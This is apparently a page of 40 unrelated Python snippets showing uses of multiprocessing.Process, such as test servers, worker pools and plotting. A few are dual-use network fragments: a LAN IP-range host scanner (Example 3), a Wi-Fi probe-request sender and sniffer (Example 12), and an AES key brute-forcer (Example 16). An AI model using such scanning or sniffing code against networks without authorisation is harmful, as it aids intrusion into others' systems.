Example no. 1
class KeepAliveClientTest(TestCase):

    server_address = ("127.0.0.1", 65535)

    def __init__(self, *args, **kwargs):
        super(KeepAliveClientTest, self).__init__(*args, **kwargs)
        self.server_process = Process(target=self._run_server)

    def setUp(self):
        super(KeepAliveClientTest, self).setUp()
        self.client = Client(["%s:%d" % self.server_address])
        self.server_process.start()
        time.sleep(.10)

    def tearDown(self):
        self.server_process.terminate()
        super(KeepAliveClientTest, self).tearDown()

    def _run_server(self):
        self.server = BaseHTTPServer.HTTPServer(self.server_address, ClientAddressRequestHandler)
        self.server.handle_request()

    def test_client_keepalive(self):
        for x in range(10):
            result = self.client.sql("select * from fake")

            another_result = self.client.sql("select again from fake")
            self.assertEqual(result, another_result)
Example no. 2
 def __init__(self, **kwargs):
     self.addressManager = OSC.CallbackManager()
     self.queue = Queue()
     Process.__init__(self, args=(self.queue,))
     self.daemon     = True
     self._isRunning = Value('b', True)
     self._haveSocket= Value('b', False)
Example no. 3
 def scanner_network(self,gateway):
     scan = ''
     config_gateway = gateway.split('.')
     del config_gateway[-1]
     for i in config_gateway:
         scan += str(i) + '.'
     gateway = scan
     ranger = str(self.ip_range.text()).split('-')
     jobs = []
     manager = Manager()
     on_ips = manager.dict()
     for n in xrange(int(ranger[0]),int(ranger[1])):
         ip = '{0}{1}'.format(gateway, n)
         p = Process(target=self.working,args=(ip,on_ips))
         jobs.append(p)
         p.start()
     for i in jobs: i.join()
     for i in on_ips.values():
         Headers = []
         n = i.split('|')
         self.data['IPaddress'].append(n[0])
         self.data['MacAddress'].append(n[1])
         self.data['Hostname'].append('<unknown>')
         for n, key in enumerate(reversed(self.data.keys())):
             Headers.append(key)
             for m, item in enumerate(self.data[key]):
                 item = QTableWidgetItem(item)
                 item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
                 self.tables.setItem(m, n, item)
     Headers = []
     for key in reversed(self.data.keys()):
         Headers.append(key)
     self.tables.setHorizontalHeaderLabels(Headers)
Example no. 4
def connect_multiprocess(service = VoidService, config = {}, remote_service = VoidService, remote_config = {}, args={}):
    """starts an rpyc server on a new process, bound to an arbitrary port,
    and connects to it over a socket. Basically a copy of connect_thread().
    However, if args is used and the values are shared memory objects, then changes
    will be bi-directional. That is, we now have access to shared memory.

    :param service: the local service to expose (defaults to Void)
    :param config: configuration dict
    :param remote_service: the remote service to expose (of the server; defaults to Void)
    :param remote_config: remote configuration dict (of the server)
    :param args: dict of local vars to pass to new connection, form {'name':var}

    Contributed by *@tvanzyl*
    """
    from multiprocessing import Process

    listener = socket.socket()
    listener.bind(("localhost", 0))
    listener.listen(1)

    def server(listener=listener, args=args):
        client = listener.accept()[0]
        listener.close()
        conn = connect_stream(SocketStream(client), service = remote_service, config = remote_config)
        try:
            for k in args:
                conn._local_root.exposed_namespace[k] = args[k]
            conn.serve_all()
        except KeyboardInterrupt:
            interrupt_main()

    t = Process(target = server)
    t.start()
    host, port = listener.getsockname()
    return connect(host, port, service = service, config = config)
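
A minimal usage sketch (not part of the project code above): passing a multiprocessing shared object through the `args` dict keeps it visible to both sides, as the docstring describes. The names below are illustrative only.

from multiprocessing import Value

shared = Value('i', 0)                                # lives in shared memory
conn = connect_multiprocess(args={'shared': shared})  # server gets 'shared' in its exposed namespace
shared.value += 1                                     # change is visible to the server process too
conn.close()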
Example no. 5
File: views.py Project: viep/cmdbac
    def benchmark(self, request, pk):
        queryset = Attempt.objects.all()
        attempt = get_object_or_404(queryset, id=pk)
        serializer = AttemptSerializer(attempt)

        # check payload
        payload = dict(request.data)
        if 'database' not in payload or 'benchmark' not in payload:
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        # run benchmark
        process = Process(target = utils.run_benchmark, args = (pk, payload['database'], payload['benchmark']))
        process.start()
        # utils.run_benchmark(pk, payload['database'], payload['benchmark'])
        # should know the deployer id
        deployer_id = 1
        log_file_path = os.path.join(os.path.dirname(__file__), os.pardir, 'vagrant', str(deployer_id) + '.log')
        
        def stream_response_generator():
            last_line_no = 0
            while process.is_alive():
                time.sleep(1)
                with open(log_file_path, 'r') as log_file:
                    content = log_file.readlines()
                    line_no = len(content)
                    if line_no > last_line_no:
                        yield ''.join(content[last_line_no:])
                        last_line_no = line_no
            time.sleep(1)
            with open(log_file_path, 'r') as log_file:
                content = log_file.readlines()
                line_no = len(content)
                if line_no > last_line_no:
                    yield ''.join(content[last_line_no:])

        return StreamingHttpResponse(stream_response_generator())
Example no. 6
 def __init__(self, _output_file,  header, _input_pipe, _disk_rows):
     Process.__init__(self)
 
     self.file_name = _output_file 
     self.input_pipe = _input_pipe
     self.write_rows = _disk_rows
     self.header = header
Example no. 7
    def _find_active_serial_ports_from(self, wait_duration, device_files):
        """
        Finds and returns a list of active USB serial ports.

        This spawns a process that actually does the work.

        Args:
            device_files (list of strings):
                List of device files that will be checked for serial ports.
                Note that any other device file than ttyUSBx will be ignored.

        Returns:
            List of device files that have active serial port.
            Example: ["ttyUSB2", "ttyUSB4", "ttyUSB7"]

        """
        serial_results = Queue()

        serial_finder = Process(
            target=TopologyBuilder._get_active_serial_device_files,
            args=(self, serial_results, wait_duration, device_files))
        if self._verbose:
            print "Serial thread - Finding active serial ports"

        logging.info("Finding active serial ports")
        serial_finder.start()

        return serial_results
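
A hedged usage sketch, assuming the spawned worker puts a single list of active device files on the queue it is handed (the constructor call and arguments below are illustrative):

builder = TopologyBuilder()                       # hypothetical construction
port_queue = builder._find_active_serial_ports_from(5, ["ttyUSB0", "ttyUSB2"])
active_ports = port_queue.get()                   # e.g. ["ttyUSB2"]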
Example no. 8
def start_short_timeout_app_process():
    # XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
    p = Process(target=start_short_timeout_example_server)
    p.start()
    sleep()
    check_connection()
    return p
Example no. 9
def start_echo_server_process():
    # XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
    sleep()
    p = Process(target=start_echo_server)
    p.start()
    sleep(1.5)
    return p
Example no. 10
def nct_tagging(index_name, host, port_no, process_ids,
                stopwords, umls, pos, nprocs=1):

    # open the clinical trial ids file to process
    nct_ids = []
    for line in open(process_ids, 'rb'):
        nct_ids.append(line.strip())

    # Check if index exists
    index = es_index.ElasticSearch_Index(index_name, host=host, port=port_no)
    index.add_field('ec_tags_umls', term_vector=True)

    # process each clinical trial and store to XML file
    log.info('processing clinical trials')
    procs = []
    chunksize = int(math.ceil(len(nct_ids) / float(nprocs)))
    for i in xrange(nprocs):
        p = Process(target=_worker, args=(nct_ids[chunksize * i:chunksize * (i + 1)],
                                          index_name, host, port_no,
                                          stopwords, umls, pos, (i + 1)))
        procs.append(p)
        p.start()

    for p in procs:
        p.join()
Example no. 11
 def __init__(self, func):
     Process.__init__(self)
     self.in_buffer = None
     self.out_buffer = None
     self.func = func
     # number of tokens popped from the input buffer each time
     self.n_args = len(inspect.getargspec(func).args)
Example no. 12
def send_probe_requests(interface=None, ssid=None):

    # initialize shared memory
    results = Queue()

    # start sniffer before sending out probe requests
    p = Process(target=sniffer, args=(interface, results,))
    p.start()

    # give sniffer a chance to initialize so that we don't miss
    # probe responses
    time.sleep(3)

    # send out probe requests... sniffer will catch any responses
    ProbeReq(ssid=ssid, interface=interface)

    # make sure to get results from shared memory before allowing 
    # sniffer to join with parent process 
    probe_responses = results.get()

    # join sniffer with its parent process
    p.join()

    # return results
    return probe_responses
def processFiles(patch_dir):
    root = os.getcwd()
    glbl.data_dirs = {}
    if root != patch_dir: working_path = root+"/"+patch_dir
    else: working_path = root

    for path, dirs, files in os.walk(working_path):
        if len(dirs) == 0: glbl.data_dirs[path] = ''
    

    # Multiprocessing Section
    #########################################
    Qids = glbl.data_dirs.keys()
    manager = Manager()                                      # creates shared memory manager object
    results = manager.dict()                                 # Add dictionary to manager, so it can be accessed across processes
    nextid = Queue()                                         # Create Queue object to serve as shared id generator across processes
    for qid in Qids: nextid.put(qid)                         # Load the ids to be tested into the Queue
    for x in range(0,multiprocessing.cpu_count()):           # Create one process per logical CPU
        p = Process(target=processData, args=(nextid,results)) # Assign process to the processData function, passing in the Queue and shared dictionary
        glbl.jobs.append(p)                                   # Add the process to a list of running processes
        p.start()                                             # Start process running
    for j in glbl.jobs:
        j.join()                                              # For each process, join them back to main, blocking on each one until finished
    
    # write out results
    c = 1
    sets = results.keys()
    sets.sort()
    for x in sets:
        if results[x] != 'None':
            FINAL = open('result'+str(c)+'.txt','w')
            n = "\n************************************************************************************************\n"
            FINAL.write(n+"* "+x+'    *\n'+n+results[x]+"\n")
            FINAL.close()     
            c += 1
Example no. 14
def start_workers(config):
    '''
    Picks up all the external system configuration from the config file and starts up as many processes as non-default sections in the config.
    The following elements are required from the default configuration section :
    - solr_url : base url of the solr server.
    - nova_db_server : IP or hostname of the nova controller.
    - nova_db_port : Port of the nova db to which the workers should connect.For nova+mysql this would be 3306.
    - nova_db_creds : credentials in the format user:password
    - amqp_server : IP or hostname of the amqp server. Usually, this is same as the nova controller.
    - amqp_port : Port of the AMQP server. If using RMQ this should be 5672.
    - amqp_creds : credentials in the format user:password
    
    Each non-default section of the config should represent a resource type that this system monitors. Each individual worker corresponds to
    a resource type and is run in a separate python process.
    '''
 
    logUtils.setup_logging(config)
    global _LOGGER
    _LOGGER = logUtils.get_logger(__name__)
    for section in config.sections():
        process = Process(target=worker.run, args=(config, section,))
        process.daemon = True
        process.start()
        _LOGGER.info('Started worker process - ' + str(process.pid))
        _PROCESSES.append(process)
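
A hypothetical sketch of the config layout the docstring describes; the section name "instances" and every value below are illustrative, not taken from the project:

SAMPLE_CONFIG = """
[DEFAULT]
solr_url = http://solr-host:8983/solr
nova_db_server = nova-controller
nova_db_port = 3306
nova_db_creds = nova:secret
amqp_server = nova-controller
amqp_port = 5672
amqp_creds = guest:guest

[instances]
; one worker process is started for each non-default section like this one
"""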
Example no. 15
def main():

    warnings.filterwarnings("ignore", "Degrees of freedom <= 0 for slice", RuntimeWarning)

    options = getoptions()

    setuplogger(options['log'], options['logfile'], logging.INFO)

    total_procs = options['nprocs'] * options['total_instances']
    start_offset = options['instance_id'] * options['nprocs']

    exit_code = 0

    if options['nprocs'] == 1:
        createsummary(options, None, None)
    else:
        proclist = []
        for procid in xrange(options['nprocs']):
            p = Process( target=createsummary, args=(options, total_procs, start_offset + procid) )
            p.start()
            proclist.append(p)

        for proc in proclist:
            proc.join()
            exit_code += proc.exitcode

    sys.exit(exit_code)
Example no. 16
def main():
	# Threads we will use; don't change this because each thread calculates keys for exactly 100 games
	# (You can change this if you know how; I'm too euphoric right now to add more flexibility)
	start = time();
	threads = 10;
	for line in sys.stdin:
		# Parsing the stdin
		encryptedMessage,encryptedGames = line.strip().split(':');
		encryptedGames = encryptedGames.split('~');
		# Queue with keys
		q = Queue();
		# Threads
		for i in range(10):
			p = Process(target=keysFinder, args=(encryptedGames[i*100:(i+1)*100],q));
			p.start();
		# Number of threads already finished
		finished = 0;
		keys = [];
		while finished < threads:
			keys += q.get();
			finished+=1;

		# From all keys, try which one decrypts a valid message
		em = binascii.unhexlify(encryptedMessage);
		found = False;
		for key in keys:
			x = AES.new(key);
			dec = x.decrypt(em);
			if (isCorrect(dec)):
				found = True;
				# Make unpadding and print. Voila!
				print removePadding(dec.strip());
	if (sys.argv[1] == 'benchmark'):
		print "Time elapsed: ",time()-start;
Example no. 17
 def __init__(self, dt=1):
     import psutil
     Process.__init__(self)
     self.daemon = True
     self.dt = dt
     self.parent = psutil.Process(current_process().pid)
     self.parent_conn, self.child_conn = Pipe()
 def __init__(self, callback=None, log=True, log_level="DEBUG"):
     """ Initialize the data parser, connect to the can bus. """
     Process.__init__(self)
     self.callback = callback
     self.log = log
     self.log_level = log_level
     self.data = {}
Example no. 19
class TCPServer(object):
    def __init__(self, port):
        self.port = int(port)

    def start(self):
        def go(port):
            from httpretty import HTTPretty
            HTTPretty.disable()
            import socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind(('localhost', port))
            s.listen(True)
            conn, addr = s.accept()

            while True:
                data = conn.recv(1024)
                conn.send(b"RECEIVED: " + bytes(data))

            conn.close()

        args = [self.port]
        self.process = Process(target=go, args=args)
        self.process.start()
        time.sleep(0.4)

    def stop(self):
        try:
            os.kill(self.process.pid, 9)
        except OSError:
            self.process.terminate()
        finally:
            self.is_running = False
Example no. 20
def webgui(args):
    os.environ["FWDB_CONFIG"] = json.dumps(get_lp(args).to_dict())
    from fireworks.flask_site.app import app
    if args.wflowquery:
        app.BASE_Q_WF = json.loads(args.wflowquery)
    if args.fwquery:
        app.BASE_Q = json.loads(args.fwquery)
        if "state" in app.BASE_Q:
            app.BASE_Q_WF["state"] = app.BASE_Q["state"]

    if not args.server_mode:
        from multiprocessing import Process
        p1 = Process(
            target=app.run,
            kwargs={"host": args.host, "port": args.port, "debug": args.debug})
        p1.start()
        import webbrowser
        time.sleep(2)
        webbrowser.open("http://{}:{}".format(args.host, args.port))
        p1.join()
    else:
        from fireworks.flask_site.app import bootstrap_app
        try:
            from fireworks.flask_site.gunicorn import (
                StandaloneApplication, number_of_workers)
        except ImportError:
            import sys
            sys.exit("Gunicorn is required for server mode. "
                     "Install using `pip install gunicorn`.")
        options = {
            'bind': '%s:%s' % (args.host, args.port),
            'workers': number_of_workers(),
        }
        StandaloneApplication(bootstrap_app, options).run()
Example no. 21
class ClockInfoUpdater(object):
    def __init__(self):
        self.weather_parent_pipe, weather_child_pipe = Pipe()
        weather = WeatherAPIClient(weather_child_pipe)
        self.weather_api_client = Process(target=weather.run_forever)
        self.weather_api_client.start()

        self.traffic_parent_pipe, traffic_child_pipe = Pipe()
        traffic = TrafficAPIClient(traffic_child_pipe)
        self.traffic_api_client = Process(target=traffic.run_forever)
        self.traffic_api_client.start()

    def run(self, clock_info, update_freq):
        now = datetime.now()
        last_update = clock_info.get('last_update_time')
        if last_update:
            update_time_delta = now - last_update
            if update_time_delta.total_seconds() < update_freq:
                return False
        clock_info['last_update_time'] = now
        update_time(clock_info, now)
        update_weather(clock_info, now, self.weather_parent_pipe)
        update_color(clock_info, now)
        update_traffic(clock_info, now, self.traffic_parent_pipe)
        return True
Example no. 22
 def __init__(self, worker, outlist, index):
     Process.__init__(self)
     self.worker = worker
     if worker is None or worker.element is None:
         raise MultiProjectException("Bug: Invalid Worker")
     self.outlist = outlist
     self.index = index
    def __init__(self, response_queue, backup_name, host_port, user, password, authdb, base_dir, binary,
                 dump_gzip=False, verbose=False):
        Process.__init__(self)
        self.host, port     = host_port.split(":")
        self.host_port      = host_port
        self.port           = int(port)
        self.response_queue = response_queue
        self.backup_name    = backup_name
        self.user           = user
        self.password       = password
        self.authdb         = authdb
        self.base_dir       = base_dir
        self.binary         = binary
        self.dump_gzip      = dump_gzip
        self.verbose        = verbose

        self._command   = None
        self.completed  = False 
        self.backup_dir = "%s/%s" % (self.base_dir, self.backup_name)
        self.dump_dir   = "%s/dump" % self.backup_dir
        self.oplog_file = "%s/oplog.bson" % self.dump_dir
        self.start_time = time()

        signal(SIGINT, self.close)
        signal(SIGTERM, self.close)
    def serve(self):
        """Start a fixed number of worker threads and put client into a queue"""

        #this is a shared state that can tell the workers to exit when set as false
        self.isRunning.value = True

        #first bind and listen to the port
        self.serverTransport.listen()

        #fork the children
        for i in range(self.numWorkers):
            try:
                w = Process(target=self.workerProcess)
                w.daemon = True
                w.start()
                self.workers.append(w)
            except (Exception) as x:
                logging.exception(x)

        #wait until the condition is set by stop()

        while True:

            self.stopCondition.acquire()
            try:
                self.stopCondition.wait()
                break
            except (SystemExit, KeyboardInterrupt):
                break
            except (Exception) as x:
                logging.exception(x)

        self.isRunning.value = False
Example no. 25
def run_stock_parser():
    symbol_q = Queue()
    price_q = Queue()

    stock_symbols = []
    with open('symbols.txt', 'r') as symfile:
        for n, line in enumerate(symfile):
            sym = line.strip()
            if sym:
                stock_symbols.append(sym)

    ncpu = len([x for x in open('/proc/cpuinfo').read().split('\n')\
                if x.find('processor') == 0])

    pool = [Process(target=read_stock_worker, args=(symbol_q, price_q, )) for _ in range(ncpu * 4)]

    for p in pool:
        p.start()
    output = Process(target=write_output_file, args=(price_q, ))
    output.start()

    for symbol in stock_symbols:
        symbol_q.put(symbol)
    symbol_q.put(_sentinel)
    for p in pool:
        p.join()
    price_q.put(_sentinel)
    output.join()
Example no. 26
 def start_parser_process(self):
     if self.mp_mode:
         from multiprocessing import Process, Event
     else:
         from multiprocessing.dummy import Process, Event
     waiting_shutdown_event = Event()
     if self.mp_mode:
         bot = self.bot.__class__(
             network_result_queue=self.network_result_queue,
             parser_result_queue=self.parser_result_queue,
             waiting_shutdown_event=waiting_shutdown_event,
             shutdown_event=self.shutdown_event,
             parser_mode=True,
             meta=self.bot.meta)
     else:
         # In non-multiprocess mode we start the `run_process` method
         # in a new semi-process (actually a thread). Because we use
         # `run_process` of the main spider instance, all changes made
         # in handlers are applied to the main spider instance, which
         # allows supporting deprecated spiders that do not know about
         # the multiprocessing mode
         bot = self.bot
         bot.network_result_queue = self.network_result_queue
         bot.parser_result_queue = self.parser_result_queue
         bot.waiting_shutdown_event = waiting_shutdown_event
         bot.shutdown_event = self.shutdown_event
         bot.meta = self.bot.meta
     proc = Process(target=bot.run_parser)
     if not self.mp_mode:
         proc.daemon = True
     proc.start()
     return waiting_shutdown_event, proc
Example no. 27
class MultiProcessPlot(object):
	## Initialization
	def __init__(self):
		self.plotpipe, PlotterPipe = Pipe()
		## Called process for plotting
		self.plotter = ProcessPlotter()
		## Process holder
		self.plotprocess = Process(target = self.plotter, args = (PlotterPipe, ))
		self.plotprocess.daemon = True
		self.plotprocess.start()

	## Plot function
	def plot(self, finished=False):
		send = self.plotpipe.send

		if finished:
			send(None)
		else:
			if not LoopCounter % plotRefreshPeriod:
				reset = 1
			else:
				reset = 0

			## Compose data for pipe
			data = [reset,
					MessageMeasurement.pose2d.x, MessageMeasurement.pose2d.y, MessageMeasurement.pose2d.theta,
					MessageEKF.odompose2d.x, MessageEKF.odompose2d.y, MessageEKF.odompose2d.theta,
					MessageEKF.ekfpose2d.x, MessageEKF.ekfpose2d.y, MessageEKF.ekfpose2d.theta]
			# print(MessageEKF.ekfpose2d.x, MessageEKF.ekfpose2d.y, MessageEKF.ekfpose2d.theta) # //VB
			# print(MessageEKF.odompose2d.x, MessageEKF.odompose2d.y, MessageEKF.odompose2d.theta) # //VB
			## Send data through pipe
			send(data)
			## Reset global flags to receive new input
			flagSubscriber1 = False
			flagSubscriber2 = False
Example no. 28
class FakeProcess:
    '''
    Runs an instance of multiprocessing.Process, which displays fake results based on PySystemMock.fakeCommandResult{},
    or based on a generic countdown using the command string, in the event that fakeCommandResult{} doesn't match.
    This class functions as an adapter from multiprocessing.Process() to subprocess.Popen(), which the caller will expect.
    '''
    stdout = FakeStdout()  # can be read by callers as if it's a Process.stdout object
    process = None

    MOCK_STEPS_ITERATIONS = 5

    def start(self, command, fakeCommandResults):
        fakeCommandResult = self.getFakeResultForCommand(command, fakeCommandResults)
        self.process = Process(target=writeFakeCommandResultsToPipe, args=(self.stdout.writer, fakeCommandResult))
        self.process.start()

    def getFakeResultForCommand(self, command, fakeCommandResults):
        for regex in fakeCommandResults:
            match = re.search(regex, command.__str__())
            if match:
                return fakeCommandResults[regex].split('\n')
        return ["processing %s [%d]..." % (command, i) for i in range(self.MOCK_STEPS_ITERATIONS, 0, -1)]

    def poll(self):
        return self.process.exitcode

    def wait(self):
        # multiprocessing.Process has no wait(); join() and return the exit code
        # so callers expecting a subprocess.Popen-like wait() still get a return code
        self.process.join()
        return self.process.exitcode

    def terminate(self):
        self.process.terminate()
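
A hedged sketch of how a test might drive FakeProcess in place of subprocess.Popen; the command string and regex key are made up, and reading from `stdout` assumes FakeStdout behaves like a file object, as the docstring implies:

fake = FakeProcess()
fake.start('ls -l', {r'^ls': 'file_a\nfile_b'})   # canned two-line result for any "ls ..." command
fake.wait()                                       # adapter: join the child and expose its exit code
first_line = fake.stdout.readline()               # assumed FakeStdout API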
Example no. 29
def apply_update(fname, status):
    # As soon as python-apt closes its opened files on object deletion
    # we can drop this fork workaround. As long as they keep their files
    # open, we run the code in its own fork; then the files are closed on
    # process termination and we can remount the filesystem read-only
    # without errors.
    p = Process(target=_apply_update, args=(fname, status))
    with rw_access("/", status):
        try:
            t_ver = get_target_version(fname)
        except BaseException:
            status.log('Reading xml-file failed!')
            return

        try:
            c_ver = get_current_version()
        except IOError as e:
            status.log('get current version failed: ' + str(e))
            c_ver = ""

        pre_sh(c_ver, t_ver, status)
        p.start()
        p.join()
        status.log("cleanup /var/cache/apt/archives")
        # don't use execute() here, it results in an error that the apt-cache
        # is locked. We currently don't understand this behaviour :(
        os.system("apt-get clean")
        if p.exitcode != 0:
            raise Exception(
                "Applying update failed. See logfile for more information")
        post_sh(c_ver, t_ver, status)
Example no. 30
def run_parkinglot_expt(net, n):
    "Run experiment"

    seconds = args.time

    # Start the bandwidth and cwnd monitors in the background
    monitor = Process(target=monitor_devs_ng,
            args=('%s/bwm.txt' % args.dir, 1.0))
    monitor.start()
    start_tcpprobe()

    # Get receiver and clients
    recvr = net.getNodeByName('receiver')
    sender1 = net.getNodeByName('h1')

    # Start the receiver
    port = 5001
    recvr.cmd('iperf -s -p', port,
              '> %s/iperf_server.txt' % args.dir, '&')

    waitListening(sender1, recvr, port)

    # TODO: start the sender iperf processes and wait for the flows to finish
    # Hint: Use getNodeByName() to get a handle on each sender.
    # Hint: Use sendCmd() and waitOutput() to start iperf and wait for them to finish
    # Hint: waitOutput waits for the command to finish allowing you to wait on a particular process on the host
    # iperf command to start flow: 'iperf -c %s -p %s -t %d -i 1 -yc > %s/iperf_%s.txt' % (recvr.IP(), 5001, seconds, args.dir, node_name)
    # Hint (not important): You may use progress(t) to track your experiment progress
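    # A hedged sketch of what the TODO above might look like (assumes the sender
    # hosts are named h1..hN, with N taken from this function's `n` argument):
    #
    # senders = [net.getNodeByName('h%d' % (i + 1)) for i in range(n)]
    # for i, sender in enumerate(senders):
    #     sender.sendCmd('iperf -c %s -p %s -t %d -i 1 -yc > %s/iperf_%s.txt'
    #                    % (recvr.IP(), port, seconds, args.dir, 'h%d' % (i + 1)))
    # for sender in senders:
    #     sender.waitOutput()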

    recvr.cmd('kill %iperf')

    # Shut down monitors
    monitor.terminate()
    stop_tcpprobe()
Example no. 31
class Mapping(object):
    def __init__(self):
        self.state = None
        self.state = None
        self.q = Queue()
        self.vp = Process(target=self.viewer_thread, args=(self.q,))
        self.vp.daemon = True
        self.vp.start()

    def viewer_thread(self, q):
        self.viewer_init(1024, 768)
        while True:
            self.viewer_refresh(q)

    # from py_pangolin:
    def viewer_init(self, w, h):
        pangolin.CreateWindowAndBind('Map Viewer', w, h)
        gl.glEnable(gl.GL_DEPTH_TEST)

        self.scam = pangolin.OpenGlRenderState(
            pangolin.ProjectionMatrix(w, h, 420, 420, w // 2, h // 2, 0.2, 10000),
            pangolin.ModelViewLookAt(0, -10, -8,
                                     0, 0, 0,
                                     0, -1, 0))
        self.handler = pangolin.Handler3D(self.scam)
        # Create Interactive View in window
        self.dcam = pangolin.CreateDisplay()
        self.dcam.SetBounds(0.0, 1.0, 0.0, 1.0, w / h)
        self.dcam.SetHandler(self.handler)  
        # hack to avoid small Pangolin, no idea why it's *2
        self.dcam.Resize(pangolin.Viewport(0, 0, w * 2, h * 2))
        self.dcam.Activate()

    def viewer_refresh(self, q):
        while not q.empty():
            self.state = q.get()

        gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
        gl.glClearColor(0.0, 0.0, 0.0, 1.0)
        self.dcam.Activate(self.scam)

        if self.state is not None:
            if self.state[0].shape[0] >= 2:
                # draw poses
                gl.glColor3f(0.0, 1.0, 0.0)
                pangolin.DrawCameras(self.state[0][:-1])

            if self.state[0].shape[0] >= 1:
                # draw current pose as yellow
                gl.glColor3f(1.0, 1.0, 0.0)
                pangolin.DrawCameras(self.state[0][-1:])

            if self.state[1].shape[0] != 0:
                # draw keypoints
                gl.glPointSize(5)
                gl.glColor3f(1.0, 0.0, 0.0)
                pangolin.DrawPoints(self.state[1], self.state[2])

        pangolin.FinishFrame()

    def draw(self, mapp):
        if self.q is None:
            return
        poses, pts, colors = [], [], []
        for f in mapp.frames:
            # invert pose for display only
            poses.append(np.linalg.inv(f.pose))
        for p in mapp.points:
            pts.append(p.loc)
            colors.append(p.color)
        self.q.put((np.array(poses), np.array(pts), np.array(colors) / 256.0))
Example no. 32
app = Flask(__name__)

if __name__ == '__main__':
    train_q = Queue()
    result_q = Queue()

    master = environ.get("MAP_MASTER", "local[*]")
    dburl = environ.get("MAP_DBURL", "mongodb://localhost")

    options()["spark_master"] = master
    options()["db_url"] = dburl
    options()["train_queue"] = train_q
    options()["result_queue"] = result_q

    p = Process(target=workloop, args=(master, train_q, result_q, dburl))
    p.start()

    # wait for worker to spin up
    result_q.get()

    def sanitize_model(m):
        result = dict([(k, m[k]) for k in ["_id", "name", "urls", "status"]])
        result["id"] = result.pop("_id")
        return result
    
    @app.route("/live")
    def live():
        response = None
        try:
            model_collection().find()
Example no. 33
#     print('='*args2)
#
# if __name__ == '__main__':
#     p_lst = []
#     for i in range(10):
#         p = Process(target=func, args=(10*i, 20*i))
#         p_lst.append(p)
#         p.start()
#     [p.join() for p in p_lst]
#     print('done running')


def func(filename, content):
    with open(filename, 'w') as f:
        f.write(content*10*'*')


if __name__ == '__main__':
    p_lst = []
    for i in range(5):
        p = Process(target=func, args=('info{}'.format(i), i))
        p_lst.append(p)
        p.start()
    [p.join() for p in p_lst]   # all of the preceding processes must finish here before the code below can run
    print([i for i in os.walk(r'D:\program\oldmantest\quanzhan\day36andday37')])

# synchronous: 0.1 * 500 = 50
# asynchronous: 500 tasks of 0.1 each, running concurrently ≈ 0.1
# write files with multiple processes
# first write content into the files
# then show the user all the file names in the folder after writing
Example no. 34
        first_level.do_find_passwd()
    elif cmd == '0131':
        # 0131 user_id
        first_level.do_find_passwd_info() 
    elif cmd == '014':
        # quit request (quit after a failed login or registration)
        first_level.do_quit()
# the server checks whether clients are still alive
def check_alive(sec,conn,q):
    check_heart(sec,conn,q)
    # scheduled task, use schedule


if __name__ == "__main__":
    print("start....")
    p1 = Process(target = tcp_server)
    p2 = Process(target = udp_server,args=(queue_online,))
    # p3 = Process(target = check_alive,args = (45,db_operate,q))
    p4 = Process(target = file_server)
    p5 = Process(target = find_friend_server,args=(db_operate,))
    p2.daemon = True
    # p3.daemon = True
    # a daemon process may not have child processes
    # p4.daemon = True
    p1.start()
    p2.start()
    # p3.start()
    p4.start()
    p5.start()
    p1.join()
    # close the database when the process ends
Example no. 35
        f.Prune(3, 3)
      pickle.dump(f, open(fn, "w"))
      print "feature build %s succ" % fn
      return
    else:
      cache.append(r)
      if len(cache) >= cs:
        f.Build(cache)
        cache = []


q_norm = Queue(10*10000)
jobs = []


p = Process(target = BuildJob, args = (q_norm, "chat_text_f.dat", 100))
jobs.append(p)
p.start()

# word_vec =[]
fp = open("chat_words.txt","w")
fk = open("chat_keywords.txt","w")
cnt = 0

#for line in open(sys.argv[1], "r"):
for line in open("all_cont.txt", "r"):
  cnt += 1
  if cnt % 1000 == 0:
    time_str = datetime.datetime.now().isoformat()
    print "[%s]: %d" % (time_str, cnt)
import multiprocessing
from datetime import datetime
from multiprocessing import Barrier, Lock, Process
from time import time


def test_with_barrier(synchronizer, serializer):
    name = multiprocessing.current_process().name
    synchronizer.wait()
    now = time()
    with serializer:
        print("process %s ------> %s" % (name, datetime.fromtimestamp(now)))


def test_without_barrier():
    name = multiprocessing.current_process().name
    now = time()
    print("process %s ------> %s" % (name, datetime.fromtimestamp(now)))


if __name__ == '__main__':
    synchronizer = Barrier(2)
    serializer = Lock()
    Process(name='p1 - test_with_barrier',
            target=test_with_barrier,
            args=(synchronizer, serializer)).start()
    Process(name='p2 - test_with_barrier',
            target=test_with_barrier,
            args=(synchronizer, serializer)).start()
    Process(name='p3 - test_without_barrier',
            target=test_without_barrier).start()
    Process(name='p4 - test_without_barrier',
            target=test_without_barrier).start()
Example no. 37
If a child process's task no longer needs to exist once the main process's task has finished, that child should be set as a daemon process before it is started. When the main process's code finishes running, the daemon process terminates immediately.

* A daemon process terminates as soon as the main process's code finishes executing
* A daemon process cannot start child processes of its own; trying to do so raises:
AssertionError: daemonic processes are not allowed to have children
'''
from multiprocessing import Process
import time
import random


def task(name):
    print('%s is piaoing' % name)
    time.sleep(random.randrange(1, 3))
    print('%s is piao end' % name)


if __name__ == '__main__':
    p = Process(target=task, args=('egon', ))
    p.daemon = True  # must be set before p.start(): makes p a daemon process, forbids p from creating child processes, and terminates p as soon as the parent's code finishes
    p.start()
    time.sleep(1)
    print('main')  # as soon as the terminal prints this line, the daemon process p ends along with it
'''
➜  Concurrency1 git:(master) ✗ python daemon.py 
main
➜  Concurrency1 git:(master) ✗ python daemon.py
egon is piaoing
main
'''
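
A minimal sketch of the second rule above: starting a child from inside a daemonic process raises the quoted AssertionError (the error surfaces in the daemon's own traceback).

from multiprocessing import Process
import time


def child():
    pass


def daemon_task():
    # raises AssertionError: daemonic processes are not allowed to have children
    Process(target=child).start()


if __name__ == '__main__':
    p = Process(target=daemon_task)
    p.daemon = True
    p.start()
    time.sleep(1)  # give the daemon time to hit the assertion before main exits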
Example no. 38
	def createProcesses(self):
		self.QueryProcesses = []
		for i in range(self.numProc):		
			process = Process(target = RateQueryWorker(), args = (self.troughQueue,self.resultQueue,))
			self.QueryProcesses.append(process)
Example no. 39
	def createProcesses(self):
		self.QueryProcesses = []
		for i in range(self.numProc):		
			process = Process(target = COOLQueryWorker(timeConverter=self.timeConverter), args = (self.troughQueue,self.resultQueue,))
			self.QueryProcesses.append(process)
Example no. 40
